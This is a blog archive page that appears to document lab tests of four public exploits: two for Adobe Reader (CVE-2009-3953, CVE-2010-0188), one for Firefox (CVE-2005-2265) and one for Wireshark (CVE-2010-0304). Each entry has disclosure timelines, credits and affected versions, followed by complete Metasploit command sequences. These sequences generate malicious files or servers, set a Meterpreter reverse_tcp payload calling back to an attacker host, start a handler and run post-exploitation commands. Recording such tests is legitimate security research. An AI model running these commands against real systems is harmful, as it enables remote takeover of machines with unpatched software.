Category Archives: Exploits

All my posts regarding exploits, PoCs and 0days.

CVE-2009-3953 : Adobe Acrobat U3D CLODProgressiveMeshDeclaration Array Overrun

Timeline :

Vulnerability provided to Secunia by Felipe Andres Manzano for versions prior to 9.2
Vulnerability provided to Secunia by Parvez Anwar for version 9.2
Vulnerabilities provided by Secunia to the vendor
Metasploit PoC provided by duck the 2009-11-25
Coordinated advisory release the 2010-01-12 !

    PoC provided by :

Felipe Andres Manzano
jduck

    Reference(s) :

CVE-2009-3953

    Affected version(s) :

Adobe Reader and Acrobat Professional prior to version 9.3
Acrobat prior to version 8.2

    Tested on Windows XP SP3 with :

    Adobe Reader 9.0.0

    Description :

This module exploits an array overflow in Adobe Reader and Adobe Acrobat. Affected versions include prior to 7.1.4, prior to 8.2, and prior to 9.3. By creating a specially crafted pdf that a contains malformed U3D data, an attacker may be able to execute arbitrary code.

    Commands :

use exploit/windows/fileformat/adobe_u3d_mes­hdecl
set OUTPUTPATH /home/eromang
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j

sessions -i 1
sysinfo
getuid
ipconfig

CVE-2010-0188 : Adobe Acrobat Bundled LibTIFF Integer Overflow

Timeline :

Vulnerability reported by Microsoft to vendor
Coordinated public disclosure the 2010-02-16
PoC provided by villy the 2010-03-12
Metasploit PoC provided by duck the 2010-03-16
PoC provided by villy on Exploit-DB the 2010-03-17

    PoC provided by :

Microsoft
villy
jduck

    Reference(s) :

CVE-2010-0188

    Affected version(s) :

Adobe Reader 9.3 and earlier versions for Windows, Macintosh, and UNIX
Adobe Acrobat 9.3 and earlier versions for Windows and Macintosh

    Tested on Windows XP SP3 with :

    Adobe Reader 9.3.0

    Description :

This module exploits an integer overflow vulnerability in Adobe Reader and Adobe Acrobat Professional versions 8.0 through 8.2 and 9.0 through 9.3.

    Commands :

use exploit/windows/fileformat/adobe_libtiff
set OUTPUTPATH /home/eromang
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j

sessions -i 1
sysinfo
getuid
ipconfig

CVE-2005-2265 : Mozilla Suite/Firefox InstallVersion compareTo() Code Execution

Timeline :

Vulnerability reported to the vendor by Aviv Raff the 2005-05-28
Version 1.0.5 of Mozilla Firefox & 1.7.10 of Mozilla Suite released the 2005-07-12
Vulnerability & PoC disclosure by Aviv Raff the 2005-07-13

    PoC provided by :

hdm
Aviv Raff

    Reference(s) :

CVE-2005-2265
MFSA 2005-50

    Affected version(s) :

Mozilla Firefox previous version 1.0.5
Mozilla Suite previous version 1.7.10

    Tested on Windows XP SP3 with :

    Mozilla Firefox 1.0.4

    Description :

This module exploits a code execution vulnerability in the Mozilla Suite, Mozilla Firefox, and Mozilla Thunderbird applications. This exploit module is a direct port of Aviv Raff’s HTML PoC.

    Commands :

use exploit/multi/browser/mozilla_compareto
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig

CVE-2010-0304 : Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow

Timeline :

Vulnerability reported to the vendor by babi
Coordinated vulnerability disclosure the 2010-01-27
Version 1.2.6 released the 2010-01-27
Exploit-DB PoC provided by babi the 2010-01-29
Metasploit PoC provided the 2010-02-01

    PoC provided by :

babi
jduck
redsand

    Reference(s) :

CVE-2010-0304
EDB-ID-11288
wnpa-sec-2010-02

    Affected version(s) :

0.9.15 to 1.0.10, 1.2.0 to 1.2.5 included

    Tested on Windows XP SP3 with :

    wireshark/tshark 1.2.5

    Description :

The LWRES dissector in Wireshark version 0.9.15 through 1.0.10 and 1.2.0 through 1.2.5 allows remote attackers to execute arbitrary code due to a stack-based buffer overflow. This bug found and reported by babi. This particular exploit targets the dissect_getaddrsbyname_request function. Several other functions also contain potentially exploitable stack-based buffer overflows. The Windows version (of 1.2.5 at least) is compiled with /GS, which prevents exploitation via the return address on the stack. Sending a larger string allows exploitation using the SEH bypass method. However, this packet will usually get fragmented, which may cause additional complications. NOTE: The vulnerable code is reached only when the packet dissection is rendered. If the packet is fragmented, all fragments must be captured and reassembled to exploit this issue.

    Commands :

use exploit/multi/misc/wireshark_lwres_getad­drbyname
set RHOST 192.168.178.41
set TARGET 4
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig